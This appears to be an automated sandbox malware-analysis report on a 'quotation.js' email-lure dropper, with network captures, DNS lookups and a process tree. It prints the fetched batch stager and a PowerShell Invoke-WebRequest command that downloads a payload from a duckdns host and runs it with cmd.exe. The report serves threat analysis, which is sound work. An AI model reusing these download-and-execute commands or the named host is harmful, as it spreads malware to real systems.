Sep 2, 2024 07:47:15.766405106 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:16.241029024 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:16.241188049 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:16.260643005 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:16.260662079 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:16.260986090 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:16.308180094 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:16.315891027 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:16.356512070 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:16.553469896 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:16.553551912 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:16.553677082 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:16.560817003 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:16.560842037 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:16.560853004 CEST | 49702 | 443 | 192.168.2.7 | 104.26.3.16
Sep 2, 2024 07:47:16.560861111 CEST | 443 | 49702 | 104.26.3.16 | 192.168.2.7
Sep 2, 2024 07:47:20.046479940 CEST | 49707 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:47:20.051443100 CEST | 80 | 49707 | 41.105.186.133 | 192.168.2.7
Sep 2, 2024 07:47:20.054006100 CEST | 49707 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:47:20.060497999 CEST | 49707 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:47:20.065296888 CEST | 80 | 49707 | 41.105.186.133 | 192.168.2.7
Sep 2, 2024 07:47:41.445280075 CEST | 80 | 49707 | 41.105.186.133 | 192.168.2.7
Sep 2, 2024 07:47:41.445341110 CEST | 49707 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:47:41.468447924 CEST | 49707 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:47:41.472174883 CEST | 49723 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:47:41.473309994 CEST | 80 | 49707 | 41.105.186.133 | 192.168.2.7
Sep 2, 2024 07:47:41.477040052 CEST | 80 | 49723 | 41.105.186.133 | 192.168.2.7
Sep 2, 2024 07:47:41.477111101 CEST | 49723 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:47:41.477346897 CEST | 49723 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:47:41.482112885 CEST | 80 | 49723 | 41.105.186.133 | 192.168.2.7
Sep 2, 2024 07:48:02.844604969 CEST | 80 | 49723 | 41.105.186.133 | 192.168.2.7
Sep 2, 2024 07:48:02.844675064 CEST | 49723 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:48:02.845135927 CEST | 49723 | 80 | 192.168.2.7 | 41.105.186.133
Sep 2, 2024 07:48:02.849999905 CEST | 80 | 49723 | 41.105.186.133 | 192.168.2.7

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 2, 2024 07:47:15.732700109 CEST | 63836 | 53 | 192.168.2.7 | 1.1.1.1
Sep 2, 2024 07:47:15.740134954 CEST | 53 | 63836 | 1.1.1.1 | 192.168.2.7
Sep 2, 2024 07:47:19.409816027 CEST | 61156 | 53 | 192.168.2.7 | 1.1.1.1
Sep 2, 2024 07:47:20.025356054 CEST | 53 | 61156 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 2, 2024 07:47:15.732700109 CEST | 192.168.2.7 | 1.1.1.1 | 0x9b5a | Standard query (0) | rentry.co | A (IP address) | IN (0x0001) | false
Sep 2, 2024 07:47:19.409816027 CEST | 192.168.2.7 | 1.1.1.1 | 0x48b6 | Standard query (0) | timmy02.duckdns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 2, 2024 07:47:15.740134954 CEST | 1.1.1.1 | 192.168.2.7 | 0x9b5a | No error (0) | rentry.co | | 104.26.3.16 | A (IP address) | IN (0x0001) | false
Sep 2, 2024 07:47:15.740134954 CEST | 1.1.1.1 | 192.168.2.7 | 0x9b5a | No error (0) | rentry.co | | 172.67.75.40 | A (IP address) | IN (0x0001) | false
Sep 2, 2024 07:47:15.740134954 CEST | 1.1.1.1 | 192.168.2.7 | 0x9b5a | No error (0) | rentry.co | | 104.26.2.16 | A (IP address) | IN (0x0001) | false
Sep 2, 2024 07:47:20.025356054 CEST | 1.1.1.1 | 192.168.2.7 | 0x48b6 | No error (0) | timmy02.duckdns.org | | 41.105.186.133 | A (IP address) | IN (0x0001) | false
HTTP hosts:
• rentry.co
• timmy02.duckdns.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49707 | 41.105.186.133 | 80 | 5428 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 07:47:20.060497999 CEST | 196 | OUT | GET /uploads/186024/Quotation.vbs.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: timmy02.duckdns.org
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49723 | 41.105.186.133 | 80 | 5428 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 07:47:41.477346897 CEST | 196 | OUT | GET /uploads/186024/Quotation.vbs.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: timmy02.duckdns.org
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 104.26.3.16 | 443 | 712 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-02 05:47:16 UTC | 155 | OUT | GET /6yg2yfkf/raw HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: rentry.co
2024-09-02 05:47:16 UTC | 697 | IN | HTTP/1.1 200 OK
Date: Mon, 02 Sep 2024 05:47:16 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 261
Connection: close
vary: Origin
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
Cache-Control: Vary
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=709Z5dzYVzugJOVU%2B2uPK3ot0o8ZYa3bSAiexQnjPVnWifveFIAB%2BEvNCYDUTISohGY7opntwyDVjK69bLl5G01LmvdSfRiy6wBX0yuOOia2hnI%2FcDK5o2zBZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bcb34534efc8cd6-EWR
2024-09-02 05:47:16 UTC | 261 | IN | Data Raw: 40 65 63 68 6f 20 6f 6e 0d 0a 53 45 54 4c 4f 43 41 4c 0d 0a 53 45 54 20 22 63 6d 64 55 52 4c 3d 44 6f 77 6e 6c 6f 61 64 55 52 4c 22 0d 0a 53 45 54 20 22 63 6d 64 50 61 74 68 3d 25 74 65 6d 70 25 5c 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 2e 74 6d 70 22 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 70 61 73 73 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 27 25 63 6d 64 55 52 4c 25 27 20 2d 4f 75 74 46 69 6c 65 20 27 25 63 6d 64 50 61 74 68 25 27 20 22 0d 0a 63 6d 64 2e 65 78 65 20 2f 63 20 22 25 63 6d 64 50 61 74 68 25 22 0d 0a 74 61 73 6b 6b 69 6c 6c 20 2f 66 20 2f 69 6d 20 77 73 63 72 69 70 74 2e 65 78 65 0d 0a 45 4e 44 4c 4f 43 41 4c 0d 0a 44 45 4c 20
Data Ascii: @echo onSETLOCALSET "cmdURL=DownloadURL"SET "cmdPath=%temp%\DownloadFile.tmp"powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri '%cmdURL%' -OutFile '%cmdPath%' "cmd.exe /c "%cmdPath%"taskkill /f /im wscript.exeENDLOCALDEL

                        Target ID:1
                        Start time:01:47:13
                        Start date:02/09/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js"
                        Imagebase:0x7ff7ac2a0000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:01:47:16
                        Start date:02/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "
                        Imagebase:0x7ff75da10000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:01:47:16
                        Start date:02/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:01:47:16
                        Start date:02/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:18
                        Start time:02:59:07
                        Start date:02/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php"
                        Imagebase:0x7ff7fc7a0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:19
                        Start time:02:59:07
                        Start date:02/09/2024
                        Path:C:\Windows\System32\taskkill.exe
                        Wow64 process (32bit):false
                        Commandline:taskkill /f /im wscript.exe
                        Imagebase:0x7ff7e4760000
                        File size:101'376 bytes
                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                          Memory Dump Source
                          • Source File: 0000000A.00000002.1787588939.00007FFAAC220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c61384e4d7c952ea1e1802a5bc321e3470039448e9d80db9f041014ee9278fad
                          • Instruction ID: cb3b836c4a34a4979dca9da0660c0d9c65dbfb5a232da9f2b74ea4560536ed07
                          • Opcode Fuzzy Hash: c61384e4d7c952ea1e1802a5bc321e3470039448e9d80db9f041014ee9278fad
                          • Instruction Fuzzy Hash: 99D1276190EB8A8FE766AB6888555B5BFE0EF16320F0841FED44DC72D3E919D80DC391
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1786850872.00007FFAAC150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC150000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac150000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                          • Instruction ID: 81efa9bd2774cbb50d7d2fca3ca2fbb11715c4afb94e494e09b718e93f0e5383
                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                          • Instruction Fuzzy Hash: 3801447111CB0C8FD748EF0CE451AA5B7E0FB95364F50056DE58AC3665DA26E882CB45
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1786850872.00007FFAAC150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC150000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac150000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7875aac52959f1cb9ce4ee8a7154f3382810bda9fc716580b4657f3dcf07efd4
                          • Instruction ID: 8b23b94fe576e33b337d226a27739f2ca7424d181e7843912e06513a50a31655
                          • Opcode Fuzzy Hash: 7875aac52959f1cb9ce4ee8a7154f3382810bda9fc716580b4657f3dcf07efd4
                          • Instruction Fuzzy Hash: B6210561B4EE8E4FE7C6D72C8868665BBD0EF6621170481BAD04DC72A2DD2CDC498781
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1786850872.00007FFAAC150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC150000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac150000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (0$8,$@J$p0
                          • API String ID: 0-1014356891
                          • Opcode ID: e6e75b96730afcf0bbac2ce4ccda084afe8964f5c55257b8dec46425f2f6914d
                          • Instruction ID: 2b419db1cbbf4a8ee335ccc555dc19df4453fc4954614b820afdcfb10bf12723
                          • Opcode Fuzzy Hash: e6e75b96730afcf0bbac2ce4ccda084afe8964f5c55257b8dec46425f2f6914d
                          • Instruction Fuzzy Hash: 87917F83A0FAC69FF35787E858561796E50AF63650B5C80FFD0CD8A1D7A849EE0D82C1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1786850872.00007FFAAC150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC150000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac150000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (0$8,$p0$/
                          • API String ID: 0-2790007160
                          • Opcode ID: 2f2680329b605be0022fb3490f03ef55b0a9096f387fd92d2b6139863ef2b91b
                          • Instruction ID: 85a78d50228aae1a68bc81b20b0f11b918cbfa4dbfa0eb9ccd25678772238afc
                          • Opcode Fuzzy Hash: 2f2680329b605be0022fb3490f03ef55b0a9096f387fd92d2b6139863ef2b91b
                          • Instruction Fuzzy Hash: 2B212C82A0F7C68FF32747E858660696E51AF23210B5980FFD0C88A5D79449DD4D83D2